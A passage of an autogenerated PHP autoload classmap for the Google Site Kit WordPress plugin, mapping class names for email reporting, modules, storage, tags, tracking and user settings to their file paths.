'/Core/Email_Reporting/Email_Log_Batch_Query.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Email_Log_Cleanup' => $baseDir . '/Core/Email_Reporting/Email_Log_Cleanup.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Email_Log_Processor' => $baseDir . '/Core/Email_Reporting/Email_Log_Processor.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Email_Report_Data_Section_Part' => $baseDir . '/Core/Email_Reporting/Email_Report_Data_Section_Part.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Email_Report_Payload_Processor' => $baseDir . '/Core/Email_Reporting/Email_Report_Payload_Processor.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Email_Report_Section_Builder' => $baseDir . '/Core/Email_Reporting/Email_Report_Section_Builder.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Email_Report_Sender' => $baseDir . '/Core/Email_Reporting/Email_Report_Sender.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Email_Reporting' => $baseDir . '/Core/Email_Reporting/Email_Reporting.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Email_Reporting_Data_Requests' => $baseDir . '/Core/Email_Reporting/Email_Reporting_Data_Requests.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Email_Reporting_Pointer' => $baseDir . '/Core/Email_Reporting/Email_Reporting_Pointer.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Email_Reporting_Scheduler' => $baseDir . '/Core/Email_Reporting/Email_Reporting_Scheduler.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Email_Reporting_Settings' => $baseDir . '/Core/Email_Reporting/Email_Reporting_Settings.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Email_Reporting_Site_Health' => $baseDir . '/Core/Email_Reporting/Email_Reporting_Site_Health.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Email_Template_Formatter' => $baseDir . '/Core/Email_Reporting/Email_Template_Formatter.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Email_Template_Renderer' => $baseDir . '/Core/Email_Reporting/Email_Template_Renderer.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Email_Template_Renderer_Factory' => $baseDir . '/Core/Email_Reporting/Email_Template_Renderer_Factory.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Fallback_Task' => $baseDir . '/Core/Email_Reporting/Fallback_Task.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Frequency_Planner' => $baseDir . '/Core/Email_Reporting/Frequency_Planner.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Initiator_Task' => $baseDir . '/Core/Email_Reporting/Initiator_Task.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Max_Execution_Limiter' => $baseDir . '/Core/Email_Reporting/Max_Execution_Limiter.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Monitor_Task' => $baseDir . '/Core/Email_Reporting/Monitor_Task.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Plain_Text_Formatter' => $baseDir . '/Core/Email_Reporting/Plain_Text_Formatter.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\REST_Email_Reporting_Controller' => $baseDir . '/Core/Email_Reporting/REST_Email_Reporting_Controller.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Report_Options\\Report_Options' => $baseDir . '/Core/Email_Reporting/Report_Options/Report_Options.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Sections_Map' => $baseDir . '/Core/Email_Reporting/Sections_Map.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Subscribed_Users_Query' => $baseDir . '/Core/Email_Reporting/Subscribed_Users_Query.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Was_Analytics_4_Connected' => $baseDir . '/Core/Email_Reporting/Was_Analytics_4_Connected.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Worker_Task' => $baseDir . '/Core/Email_Reporting/Worker_Task.php', 'Google\\Site_Kit\\Core\\Expirables\\Expirable_Items' => $baseDir . '/Core/Expirables/Expirable_Items.php', 'Google\\Site_Kit\\Core\\Expirables\\Expirables' => $baseDir . '/Core/Expirables/Expirables.php', 'Google\\Site_Kit\\Core\\Expirables\\REST_Expirable_Items_Controller' => $baseDir . '/Core/Expirables/REST_Expirable_Items_Controller.php', 'Google\\Site_Kit\\Core\\Feature_Tours\\Dismissed_Tours' => $baseDir . '/Core/Feature_Tours/Dismissed_Tours.php', 'Google\\Site_Kit\\Core\\Feature_Tours\\Feature_Tours' => $baseDir . '/Core/Feature_Tours/Feature_Tours.php', 'Google\\Site_Kit\\Core\\Feature_Tours\\REST_Feature_Tours_Controller' => $baseDir . '/Core/Feature_Tours/REST_Feature_Tours_Controller.php', 'Google\\Site_Kit\\Core\\Guards\\Guard_Interface' => $baseDir . '/Core/Guards/Guard_Interface.php', 'Google\\Site_Kit\\Core\\HTTP\\Middleware' => $baseDir . '/Core/HTTP/Middleware.php', 'Google\\Site_Kit\\Core\\Key_Metrics\\Key_Metrics' => $baseDir . '/Core/Key_Metrics/Key_Metrics.php', 'Google\\Site_Kit\\Core\\Key_Metrics\\Key_Metrics_Settings' => $baseDir . '/Core/Key_Metrics/Key_Metrics_Settings.php', 'Google\\Site_Kit\\Core\\Key_Metrics\\Key_Metrics_Setup_Completed_By' => $baseDir . '/Core/Key_Metrics/Key_Metrics_Setup_Completed_By.php', 'Google\\Site_Kit\\Core\\Key_Metrics\\Key_Metrics_Setup_New' => $baseDir . '/Core/Key_Metrics/Key_Metrics_Setup_New.php', 'Google\\Site_Kit\\Core\\Key_Metrics\\REST_Key_Metrics_Controller' => $baseDir . '/Core/Key_Metrics/REST_Key_Metrics_Controller.php', 'Google\\Site_Kit\\Core\\Modules\\AdSense\\Tag_Matchers' => $baseDir . '/Modules/AdSense/Tag_Matchers.php', 'Google\\Site_Kit\\Core\\Modules\\Analytics_4\\Tag_Matchers' => $baseDir . '/Modules/Analytics_4/Tag_Matchers.php', 'Google\\Site_Kit\\Core\\Modules\\Datapoint' => $baseDir . '/Core/Modules/Datapoint.php', 'Google\\Site_Kit\\Core\\Modules\\Executable_Datapoint' => $baseDir . '/Core/Modules/Executable_Datapoint.php', 'Google\\Site_Kit\\Core\\Modules\\Module' => $baseDir . '/Core/Modules/Module.php', 'Google\\Site_Kit\\Core\\Modules\\Module_Registry' => $baseDir . '/Core/Modules/Module_Registry.php', 'Google\\Site_Kit\\Core\\Modules\\Module_Settings' => $baseDir . '/Core/Modules/Module_Settings.php', 'Google\\Site_Kit\\Core\\Modules\\Module_Sharing_Settings' => $baseDir . '/Core/Modules/Module_Sharing_Settings.php', 'Google\\Site_Kit\\Core\\Modules\\Module_With_Activation' => $baseDir . '/Core/Modules/Module_With_Activation.php', 'Google\\Site_Kit\\Core\\Modules\\Module_With_Assets' => $baseDir . '/Core/Modules/Module_With_Assets.php', 'Google\\Site_Kit\\Core\\Modules\\Module_With_Assets_Trait' => $baseDir . '/Core/Modules/Module_With_Assets_Trait.php', 'Google\\Site_Kit\\Core\\Modules\\Module_With_Data_Available_State' => $baseDir . '/Core/Modules/Module_With_Data_Available_State.php', 'Google\\Site_Kit\\Core\\Modules\\Module_With_Data_Available_State_Trait' => $baseDir . '/Core/Modules/Module_With_Data_Available_State_Trait.php', 'Google\\Site_Kit\\Core\\Modules\\Module_With_Deactivation' => $baseDir . '/Core/Modules/Module_With_Deactivation.php', 'Google\\Site_Kit\\Core\\Modules\\Module_With_Debug_Fields' => $baseDir . '/Core/Modules/Module_With_Debug_Fields.php', 'Google\\Site_Kit\\Core\\Modules\\Module_With_Inline_Data' => $baseDir . '/Core/Modules/Module_With_Inline_Data.php', 'Google\\Site_Kit\\Core\\Modules\\Module_With_Inline_Data_Trait' => $baseDir . '/Core/Modules/Module_With_Inline_Data_Trait.php', 'Google\\Site_Kit\\Core\\Modules\\Module_With_Owner' => $baseDir . '/Core/Modules/Module_With_Owner.php', 'Google\\Site_Kit\\Core\\Modules\\Module_With_Owner_Trait' => $baseDir . '/Core/Modules/Module_With_Owner_Trait.php', 'Google\\Site_Kit\\Core\\Modules\\Module_With_Persistent_Registration' => $baseDir . '/Core/Modules/Module_With_Persistent_Registration.php', 'Google\\Site_Kit\\Core\\Modules\\Module_With_Scopes' => $baseDir . '/Core/Modules/Module_With_Scopes.php', 'Google\\Site_Kit\\Core\\Modules\\Module_With_Scopes_Trait' => $baseDir . '/Core/Modules/Module_With_Scopes_Trait.php', 'Google\\Site_Kit\\Core\\Modules\\Module_With_Service_Entity' => $baseDir . '/Core/Modules/Module_With_Service_Entity.php', 'Google\\Site_Kit\\Core\\Modules\\Module_With_Settings' => $baseDir . '/Core/Modules/Module_With_Settings.php', 'Google\\Site_Kit\\Core\\Modules\\Module_With_Settings_Trait' => $baseDir . '/Core/Modules/Module_With_Settings_Trait.php', 'Google\\Site_Kit\\Core\\Modules\\Module_With_Tag' => $baseDir . '/Core/Modules/Module_With_Tag.php', 'Google\\Site_Kit\\Core\\Modules\\Module_With_Tag_Trait' => $baseDir . '/Core/Modules/Module_With_Tag_Trait.php', 'Google\\Site_Kit\\Core\\Modules\\Modules' => $baseDir . '/Core/Modules/Modules.php', 'Google\\Site_Kit\\Core\\Modules\\REST_Dashboard_Sharing_Controller' => $baseDir . '/Core/Modules/REST_Dashboard_Sharing_Controller.php', 'Google\\Site_Kit\\Core\\Modules\\REST_Modules_Controller' => $baseDir . '/Core/Modules/REST_Modules_Controller.php', 'Google\\Site_Kit\\Core\\Modules\\Shareable_Datapoint' => $baseDir . '/Core/Modules/Shareable_Datapoint.php', 'Google\\Site_Kit\\Core\\Modules\\Tag_Manager\\Tag_Matchers' => $baseDir . '/Modules/Tag_Manager/Tag_Matchers.php', 'Google\\Site_Kit\\Core\\Modules\\Tags\\Module_AMP_Tag' => $baseDir . '/Core/Modules/Tags/Module_AMP_Tag.php', 'Google\\Site_Kit\\Core\\Modules\\Tags\\Module_Tag' => $baseDir . '/Core/Modules/Tags/Module_Tag.php', 'Google\\Site_Kit\\Core\\Modules\\Tags\\Module_Tag_Guard' => $baseDir . '/Core/Modules/Tags/Module_Tag_Guard.php', 'Google\\Site_Kit\\Core\\Modules\\Tags\\Module_Tag_Matchers' => $baseDir . '/Core/Modules/Tags/Module_Tag_Matchers.php', 'Google\\Site_Kit\\Core\\Modules\\Tags\\Module_Web_Tag' => $baseDir . '/Core/Modules/Tags/Module_Web_Tag.php', 'Google\\Site_Kit\\Core\\Nonces\\Nonces' => $baseDir . '/Core/Nonces/Nonces.php', 'Google\\Site_Kit\\Core\\Notifications\\Notification' => $baseDir . '/Core/Notifications/Notification.php', 'Google\\Site_Kit\\Core\\Notifications\\Notifications' => $baseDir . '/Core/Notifications/Notifications.php', 'Google\\Site_Kit\\Core\\Permissions\\Permissions' => $baseDir . '/Core/Permissions/Permissions.php', 'Google\\Site_Kit\\Core\\Prompts\\Dismissed_Prompts' => $baseDir . '/Core/Prompts/Dismissed_Prompts.php', 'Google\\Site_Kit\\Core\\Prompts\\Prompts' => $baseDir . '/Core/Prompts/Prompts.php', 'Google\\Site_Kit\\Core\\Prompts\\REST_Prompts_Controller' => $baseDir . '/Core/Prompts/REST_Prompts_Controller.php', 'Google\\Site_Kit\\Core\\REST_API\\Data_Request' => $baseDir . '/Core/REST_API/Data_Request.php', 'Google\\Site_Kit\\Core\\REST_API\\Exception\\Invalid_Datapoint_Exception' => $baseDir . '/Core/REST_API/Exception/Invalid_Datapoint_Exception.php', 'Google\\Site_Kit\\Core\\REST_API\\Exception\\Invalid_Param_Exception' => $baseDir . '/Core/REST_API/Exception/Invalid_Param_Exception.php', 'Google\\Site_Kit\\Core\\REST_API\\Exception\\Missing_Required_Param_Exception' => $baseDir . '/Core/REST_API/Exception/Missing_Required_Param_Exception.php', 'Google\\Site_Kit\\Core\\REST_API\\REST_Route' => $baseDir . '/Core/REST_API/REST_Route.php', 'Google\\Site_Kit\\Core\\REST_API\\REST_Routes' => $baseDir . '/Core/REST_API/REST_Routes.php', 'Google\\Site_Kit\\Core\\Remote_Features\\Remote_Features' => $baseDir . '/Core/Remote_Features/Remote_Features.php', 'Google\\Site_Kit\\Core\\Remote_Features\\Remote_Features_Activation' => $baseDir . '/Core/Remote_Features/Remote_Features_Activation.php', 'Google\\Site_Kit\\Core\\Remote_Features\\Remote_Features_Cron' => $baseDir . '/Core/Remote_Features/Remote_Features_Cron.php', 'Google\\Site_Kit\\Core\\Remote_Features\\Remote_Features_Fallback' => $baseDir . '/Core/Remote_Features/Remote_Features_Fallback.php', 'Google\\Site_Kit\\Core\\Remote_Features\\Remote_Features_Provider' => $baseDir . '/Core/Remote_Features/Remote_Features_Provider.php', 'Google\\Site_Kit\\Core\\Remote_Features\\Remote_Features_Syncer' => $baseDir . '/Core/Remote_Features/Remote_Features_Syncer.php', 'Google\\Site_Kit\\Core\\Site_Health\\Debug_Data' => $baseDir . '/Core/Site_Health/Debug_Data.php', 'Google\\Site_Kit\\Core\\Site_Health\\REST_Site_Health_Controller' => $baseDir . '/Core/Site_Health/REST_Site_Health_Controller.php', 'Google\\Site_Kit\\Core\\Site_Health\\Site_Health' => $baseDir . '/Core/Site_Health/Site_Health.php', 'Google\\Site_Kit\\Core\\Site_Health\\Tag_Placement' => $baseDir . '/Core/Site_Health/Tag_Placement.php', 'Google\\Site_Kit\\Core\\Storage\\Cache' => $baseDir . '/Core/Storage/Cache.php', 'Google\\Site_Kit\\Core\\Storage\\Data_Encryption' => $baseDir . '/Core/Storage/Data_Encryption.php', 'Google\\Site_Kit\\Core\\Storage\\Encrypted_Options' => $baseDir . '/Core/Storage/Encrypted_Options.php', 'Google\\Site_Kit\\Core\\Storage\\Encrypted_User_Options' => $baseDir . '/Core/Storage/Encrypted_User_Options.php', 'Google\\Site_Kit\\Core\\Storage\\Meta_Interface' => $baseDir . '/Core/Storage/Meta_Interface.php', 'Google\\Site_Kit\\Core\\Storage\\Meta_Setting_Trait' => $baseDir . '/Core/Storage/Meta_Setting_Trait.php', 'Google\\Site_Kit\\Core\\Storage\\Options' => $baseDir . '/Core/Storage/Options.php', 'Google\\Site_Kit\\Core\\Storage\\Options_Interface' => $baseDir . '/Core/Storage/Options_Interface.php', 'Google\\Site_Kit\\Core\\Storage\\Post_Meta' => $baseDir . '/Core/Storage/Post_Meta.php', 'Google\\Site_Kit\\Core\\Storage\\Setting' => $baseDir . '/Core/Storage/Setting.php', 'Google\\Site_Kit\\Core\\Storage\\Setting\\List_Setting' => $baseDir . '/Core/Storage/Setting/List_Setting.php', 'Google\\Site_Kit\\Core\\Storage\\Setting_With_Legacy_Keys_Trait' => $baseDir . '/Core/Storage/Setting_With_Legacy_Keys_Trait.php', 'Google\\Site_Kit\\Core\\Storage\\Setting_With_Owned_Keys_Interface' => $baseDir . '/Core/Storage/Setting_With_Owned_Keys_Interface.php', 'Google\\Site_Kit\\Core\\Storage\\Setting_With_Owned_Keys_Trait' => $baseDir . '/Core/Storage/Setting_With_Owned_Keys_Trait.php', 'Google\\Site_Kit\\Core\\Storage\\Setting_With_ViewOnly_Keys_Interface' => $baseDir . '/Core/Storage/Setting_With_ViewOnly_Keys_Interface.php', 'Google\\Site_Kit\\Core\\Storage\\Term_Meta' => $baseDir . '/Core/Storage/Term_Meta.php', 'Google\\Site_Kit\\Core\\Storage\\Transients' => $baseDir . '/Core/Storage/Transients.php', 'Google\\Site_Kit\\Core\\Storage\\User_Aware_Interface' => $baseDir . '/Core/Storage/User_Aware_Interface.php', 'Google\\Site_Kit\\Core\\Storage\\User_Aware_Trait' => $baseDir . '/Core/Storage/User_Aware_Trait.php', 'Google\\Site_Kit\\Core\\Storage\\User_Options' => $baseDir . '/Core/Storage/User_Options.php', 'Google\\Site_Kit\\Core\\Storage\\User_Options_Interface' => $baseDir . '/Core/Storage/User_Options_Interface.php', 'Google\\Site_Kit\\Core\\Storage\\User_Setting' => $baseDir . '/Core/Storage/User_Setting.php', 'Google\\Site_Kit\\Core\\Storage\\User_Transients' => $baseDir . '/Core/Storage/User_Transients.php', 'Google\\Site_Kit\\Core\\Tags\\Blockable_Tag_Interface' => $baseDir . '/Core/Tags/Blockable_Tag_Interface.php', 'Google\\Site_Kit\\Core\\Tags\\Enhanced_Conversions\\Enhanced_Conversions' => $baseDir . '/Core/Tags/Enhanced_Conversions/Enhanced_Conversions.php', 'Google\\Site_Kit\\Core\\Tags\\GTag' => $baseDir . '/Core/Tags/GTag.php', 'Google\\Site_Kit\\Core\\Tags\\Google_Tag_Gateway\\Google_Tag_Gateway' => $baseDir . '/Core/Tags/Google_Tag_Gateway/Google_Tag_Gateway.php', 'Google\\Site_Kit\\Core\\Tags\\Google_Tag_Gateway\\Google_Tag_Gateway_Cron' => $baseDir . '/Core/Tags/Google_Tag_Gateway/Google_Tag_Gateway_Cron.php', 'Google\\Site_Kit\\Core\\Tags\\Google_Tag_Gateway\\Google_Tag_Gateway_Settings' => $baseDir . '/Core/Tags/Google_Tag_Gateway/Google_Tag_Gateway_Settings.php', 'Google\\Site_Kit\\Core\\Tags\\Google_Tag_Gateway\\REST_Google_Tag_Gateway_Controller' => $baseDir . '/Core/Tags/Google_Tag_Gateway/REST_Google_Tag_Gateway_Controller.php', 'Google\\Site_Kit\\Core\\Tags\\Guards\\Tag_Environment_Type_Guard' => $baseDir . '/Core/Tags/Guards/Tag_Environment_Type_Guard.php', 'Google\\Site_Kit\\Core\\Tags\\Guards\\Tag_Verify_Guard' => $baseDir . '/Core/Tags/Guards/Tag_Verify_Guard.php', 'Google\\Site_Kit\\Core\\Tags\\Guards\\WP_Query_404_Guard' => $baseDir . '/Core/Tags/Guards/WP_Query_404_Guard.php', 'Google\\Site_Kit\\Core\\Tags\\Tag' => $baseDir . '/Core/Tags/Tag.php', 'Google\\Site_Kit\\Core\\Tags\\Tag_Interface' => $baseDir . '/Core/Tags/Tag_Interface.php', 'Google\\Site_Kit\\Core\\Tags\\Tag_Matchers_Interface' => $baseDir . '/Core/Tags/Tag_Matchers_Interface.php', 'Google\\Site_Kit\\Core\\Tags\\Tag_With_DNS_Prefetch_Trait' => $baseDir . '/Core/Tags/Tag_With_DNS_Prefetch_Trait.php', 'Google\\Site_Kit\\Core\\Tags\\Tag_With_Linker_Interface' => $baseDir . '/Core/Tags/Tag_With_Linker_Interface.php', 'Google\\Site_Kit\\Core\\Tags\\Tag_With_Linker_Trait' => $baseDir . '/Core/Tags/Tag_With_Linker_Trait.php', 'Google\\Site_Kit\\Core\\Tracking\\Feature_Metrics' => $baseDir . '/Core/Tracking/Feature_Metrics.php', 'Google\\Site_Kit\\Core\\Tracking\\Feature_Metrics_Trait' => $baseDir . '/Core/Tracking/Feature_Metrics_Trait.php', 'Google\\Site_Kit\\Core\\Tracking\\Provides_Feature_Metrics' => $baseDir . '/Core/Tracking/Provides_Feature_Metrics.php', 'Google\\Site_Kit\\Core\\Tracking\\REST_Tracking_Consent_Controller' => $baseDir . '/Core/Tracking/REST_Tracking_Consent_Controller.php', 'Google\\Site_Kit\\Core\\Tracking\\Tracking' => $baseDir . '/Core/Tracking/Tracking.php', 'Google\\Site_Kit\\Core\\Tracking\\Tracking_Consent' => $baseDir . '/Core/Tracking/Tracking_Consent.php', 'Google\\Site_Kit\\Core\\User\\Audience_Segmentation' => $baseDir . '/Core/User/Audience_Segmentation.php', 'Google\\Site_Kit\\Core\\User\\Audience_Settings' => $baseDir . '/Core/User/Audience_Settings.php', 'Google\\Site_Kit\\Core\\User\\Conversion_Reporting' => $baseDir . '/Core/User/Conversion_Reporting.php', 'Google\\Site_Kit\\Core\\User\\Conversion_Reporting_Settings' => $baseDir . '/Core/User/Conversion_Reporting_Settings.php', 'Google\\Site_Kit\\Core\\User\\Email_Reporting' => $baseDir . '/Core/User/Email_Reporting.php', 'Google\\Site_Kit\\Core\\User\\Email_Reporting_Settings' => $baseDir . '/Core/User/Email_Reporting_Settings.php', 'Google\\Site_Kit\\Core\\User\\Initial_Setup' => $baseDir . '/Core/User/Initial_Setup.php', 'Google\\Site_Kit\\Core\\User\\Initial_Setup_Settings' => $baseDir . '/Core/User/Initial_Setup_Settings.php', 'Google\\Site_Kit\\Core\\User\\REST_Audience_Settings_Controller' => $baseDir . '/Core/User/REST_Audience_Settings_Controller.php', 'Google\\Site_Kit\\Core\\User\\REST_Conversion_Reporting_Controller' => $baseDir . '/Core/User/REST_Conversion_Reporting_Controller.php', 'Google\\Site_Kit\\Core\\User\\REST_Email_Reporting_Controller' => $baseDir . '/Core/User/REST_Email_Reporting_Controller.php', 'Google\\Site_Kit\\Core\\User\\REST_Initial_Setup_Controller' => $baseDir . '/Core/User/REST_Initial_Setup_Controller.php', 'Google\\Site_Kit\\Core\\User\\User' => $baseDir . '/Core/User/User.php', 'Google\\Site_Kit\\Core\\User_Input\\REST_User_Input_Controller' => $baseDir . '/Core/User_Input/REST_User_Input_Controller.php', 'Google\\Site_Kit\\Core\\User_Input\\Site_Specific_Answers' => $baseDir . '/Core/User_Input/Site_Specific_Answers.php', 'Google\\Site_Kit\\Core\\User_Input\\User_Input' => $baseDir . '/Core/User_Input/User_Input.php', 'Google\\Site_Kit\\Core\\User_Input\\User_Specific_Answers' => $baseDir . '/Core/User_Input/User_Specific_Answers.php', 'Google\\Site_Kit\\Core\\User_Surveys\\REST_User_Surveys_Controller' => $baseDir . '/Core/User_Surveys/REST_User_Surveys_Controller.php', 'Google\\Site_Kit\\Core\\User_Surveys\\Survey_Queue' => $baseDir . '/Core/User_Surveys/Survey_Queue.php', 'Google\\Site_Kit\\Core\\User_Surveys\\Survey_Timeouts' => $baseDir . '/Core/User_Surveys/Survey_Timeouts.php', 'Google\\Site_Kit\\Core\\User_Surveys\\User_Surveys' => $baseDir . '/Core/User_Surveys/User_Surveys.php', 'Google\\Site_Kit\\Core\\Util\\Activation_Flag' => $baseDir . '/Core/Util/Activation_Flag.php', 'Google\\Site_Kit\\Core\\Util\\Activation_Notice' => $baseDir . '/Core/Util/Activation_Notice.php', 'Google\\Site_Kit\\Core\\Util\\Auto_Updates' => $baseDir . '/Core/Util/Auto_Updates.php', 'Google\\Site_Kit\\Core\\Util\\BC_Functions' => $baseDir . '/Core/Util/BC_Functions.php', 'Google\\Site_Kit\\Core\\Util\\Block_Support' => $baseDir . '/Core/Util/Block_Support.php', 'Google\\Site_Kit\\Core\\Util\\Collection_Key_Cap_Filter' => $baseDir . '/Core/Util/Collection_Key_Cap_Filter.php', 'Google\\Site_Kit\\Core\\Util\\Date' => $baseDir . '/Core/Util/Date.php', 'Google\\Site_Kit\\Core\\Util\\Developer_Plugin_Installer' => $baseDir . '/Core/Util/Developer_Plugin_Installer.php', 'Google\\Site_Kit\\Core\\Util\\Entity' => $baseDir . '/Core/Util/Entity.php', 'Google\\Site_Kit\\Core\\Util\\Entity_Factory' => $baseDir . '/Core/Util/Entity_Factory.php', 'Google\\Site_Kit\\Core\\Util\\Exit_Handler' => $baseDir . '/Core/Util/Exit_Handler.php', 'Google\\Site_Kit\\Core\\Util\\Feature_Flags' => $baseDir . '/Core/Util/Feature_Flags.php', 'Google\\Site_Kit\\Core\\Util\\Google_Icon' => $baseDir . '/Core/Util/Google_Icon.php', 'Google\\Site_Kit\\Core\\Util\\Google_URL_Matcher_Trait' => $baseDir . '/Core/Util/Google_URL_Matcher_Trait.php', 'Google\\Site_Kit\\Core\\Util\\Google_URL_Normalizer' => $baseDir . '/Core/Util/Google_URL_Normalizer.php', 'Google\\Site_Kit\\Core\\Util\\Health_Checks' => $baseDir . '/Core/Util/Health_Checks.php', 'Google\\Site_Kit\\Core\\Util\\Input' => $baseDir . '/Core/Util/Input.php', 'Google\\Site_Kit\\Core\\Util\\Method_Proxy_Trait' => $baseDir . '/Core/Util/Method_Proxy_Trait.php', 'Google\\Site_Kit\\Core\\Util\\Migrate_Legacy_Keys' => $baseDir . '/Core/Util/Migrate_Legacy_Keys.php', 'Google\\Site_Kit\\Core\\Util\\Migration_1_123_0' => $baseDir . '/Core/Util/Migration_1_123_0.php', 'Google\\Site_Kit\\Core\\Util\\Migration_1_129_0' => $baseDir . '/Core/Util/Migration_1_129_0.php', 'Google\\Site_Kit\\Core\\Util\\Migration_1_150_0' => $baseDir . '/Core/Util/Migration_1_150_0.php', 'Google\\Site_Kit\\Core\\Util\\Migration_1_163_0' => $baseDir . '/Core/Util/Migration_1_163_0.php', 'Google\\Site_Kit\\Core\\Util\\Migration_1_3_0' => $baseDir . '/Core/Util/Migration_1_3_0.php', 'Google\\Site_Kit\\Core\\Util\\Migration_1_8_1' => $baseDir . '/Core/Util/Migration_1_8_1.php', 'Google\\Site_Kit\\Core\\Util\\Plugin_Status' => $baseDir . '/Core/Util/Plugin_Status.php', 'Google\\Site_Kit\\Core\\Util\\REST_Entity_Search_Controller' => $baseDir . '/Core/Util/REST_Entity_Search_Controller.php', 'Google\\Site_Kit\\Core\\Util\\Requires_Javascript_Trait' => $baseDir . '/Core/Util/Requires_Javascript_Trait.php', 'Google\\Site_Kit\\Core\\Util\\Reset' => $baseDir . '/Core/Util/Reset.php', 'Google\\Site_Kit\\Core\\Util\\Reset_Persistent' => $baseDir . '/Core/Util/Reset_Persistent.php', 'Google\\Site_Kit\\Core\\Util\\Sanitize' => $baseDir . '/Core/Util/Sanitize.php', 'Google\\Site_Kit\\Core\\Util\\Scopes' => $baseDir . '/Core/Util/Scopes.php', 'Google\\Site_Kit\\Core\\Util\\Sort' => $baseDir . '/Core/Util/Sort.php', 'Google\\Site_Kit\\Core\\Util\\Synthetic_WP_Query' => $baseDir . '/Core/Util/Synthetic_WP_Query.php', 'Google\\Site_Kit\\Core\\Util\\URL' => $baseDir . '/Core/Util/URL.php', 'Google\\Site_Kit\\Core\\Util\\Uninstallation' => $baseDir . '/Core/Util/Uninstallation.php', 'Google\\Site_Kit\\Core\\Util\\WP_Context_Switcher_Trait' => $baseDir . '/Core/Util/WP_Context_Switcher_Trait.php', 'Google\\Site_Kit\\Core\\Util\\WP_Query_Factory' => $baseDir . '/Core/Util/WP_Query_Factory.php', 'Google\\Site_Kit\\Core\\Validation\\Exception\\Invalid_Report_Dimensions_Exception' => $baseDir . '/Core/Validation/Exception/Invalid_Report_Dimensions_Exception.php', 'Google\\Site_Kit\\Core\\Validation\\Exception\\Invalid_Report_Metrics_Exception' => $baseDir . '/Core/Validation/Exception/Invalid_Report_Metrics_Exception.php', 'Google\\Site_Kit\\Modules\\AdSense' => $baseDir . '/Modules/AdSense.php', 'Google\\Site_Kit\\Modules\\AdSense\\AMP_Tag' => $baseDir . '/Modules/AdSense/AMP_Tag.php', 'Google\\Site_Kit\\Modules\\AdSense\\Ad_Blocking_Recovery_Tag' => $baseDir . '/Modules/AdSense/Ad_Blocking_Recovery_Tag.php', 'Google\\Site_Kit\\Modules\\AdSense\\Ad_Blocking_Recovery_Tag_Guard' => $baseDir . '/Modules/AdSense/Ad_Blocking_Recovery_Tag_Guard.php', 'Google\\Site_Kit\\Modules\\AdSense\\Ad_Blocking_Recovery_Web_Tag' => $baseDir . '/Modules/AdSense/Ad_Blocking_Recovery_Web_Tag.php', 'Google\\Site_Kit\\Modules\\AdSense\\Auto_Ad_Guard' => $baseDir . '/Modules/AdSense/Auto_Ad_Guard.php', 'Google\\Site_Kit\\Modules\\AdSense\\Email_Reporting\\Report_Options' => $baseDir . '/Modules/AdSense/Email_Reporting/Report_Options.php', 'Google\\Site_Kit\\Modules\\AdSense\\Settings' => $baseDir . '/Modules/AdSense/Settings.php', 'Google\\Site_Kit\\Modules\\AdSense\\Tag_Guard' => $baseDir . '/Modules/AdSense/Tag_Guard.php', 'Google\\Site_Kit\\Modules\\AdSense\\Web_Tag' => $baseDir . '/Modules/AdSense/Web_Tag.php', 'Google\\Site_Kit\\Modules\\Ads' => $baseDir . '/Modules/Ads.php', 'Google\\Site_Kit\\Modules\\Ads\\AMP_Tag' => $baseDir . '/Modules/Ads/AMP_Tag.php', 'Google\\Site_Kit\\Modules\\Ads\\Has_Tag_Guard' => $baseDir . '/Modules/Ads/Has_Tag_Guard.php', 'Google\\Site_Kit\\Modules\\Ads\\PAX_Config' => $baseDir . '/Modules/Ads/PAX_Config.php', 'Google\\Site_Kit\\Modules\\Ads\\Settings' => $baseDir . '/Modules/Ads/Settings.php', 'Google\\Site_Kit\\Modules\\Ads\\Tag_Matchers' => $baseDir . '/Modules/Ads/Tag_Matchers.php', 'Google\\Site_Kit\\Modules\\Ads\\Web_Tag' => $baseDir . '/Modules/Ads/Web_Tag.php', 'Google\\Site_Kit\\Modules\\Analytics_4' => $baseDir . '/Modules/Analytics_4.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\AMP_Tag' => $baseDir . '/Modules/Analytics_4/AMP_Tag.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Account_Ticket' => $baseDir . '/Modules/Analytics_4/Account_Ticket.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Advanced_Tracking' => $baseDir . '/Modules/Analytics_4/Advanced_Tracking.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Advanced_Tracking\\AMP_Config_Injector' => $baseDir . '/Modules/Analytics_4/Advanced_Tracking/AMP_Config_Injector.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Advanced_Tracking\\Event' => $baseDir . '/Modules/Analytics_4/Advanced_Tracking/Event.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Advanced_Tracking\\Event_List' => $baseDir . '/Modules/Analytics_4/Advanced_Tracking/Event_List.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Advanced_Tracking\\Event_List_Registry' => $baseDir . '/Modules/Analytics_4/Advanced_Tracking/Event_List_Registry.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Advanced_Tracking\\Script_Injector' => $baseDir . 